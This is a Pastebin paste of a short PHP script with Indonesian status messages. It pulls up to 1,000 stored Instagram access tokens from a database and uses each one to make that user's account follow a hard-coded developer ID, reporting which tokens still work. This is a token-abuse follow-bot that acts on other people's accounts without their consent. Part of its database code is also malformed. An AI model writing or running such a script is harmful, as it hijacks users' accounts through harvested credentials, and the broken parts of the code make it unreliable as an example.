Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- ob_start();
- @ini_set("output_buffering", "Off");
- @ini_set('implicit_flush', 1);
- @ini_set('zlib.output_compression', 0);
- @ini_set('max_execution_time', 1200);
- require_once 'config.php';
- require_once 'Instagram.php';
- $iddeveloper = '2021669034';
- $a = mysql_query('SELECT * FROM `instagram_user` ORDER BY RAND() LIMIT 0,1000') or die(mysql_error());
- while ($b = mysql_fetch_array($a)) {
- if (isset($_GET['code'])) {
- // store user access token
- $instagram->setAccessToken($b['hash']);
- $f = $instagram->modifyRelationship('follow', $iddeveloper);
- if ($f->meta->code == 200) {
- echo '<b><font color="blue">Aku Masih Idup Kakah</font></b></br>';
- }
- else {
- echo '<b><font color="red">' . $f->meta->code . ':failed:' . $b['id'] . ':' . $f->meta->error_message . '</font></b>';
- }
- $user = $instagram->getUser();
- $query1 = mysql_query("SELECT * FROM instagram_user WHERE hash='.$data->access_token'");
- $result = mysql_query($query1) or die(mysql_error());
- echo "<font color=\"red\">Orang Nya Dah Mati Kakah</font><br />";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment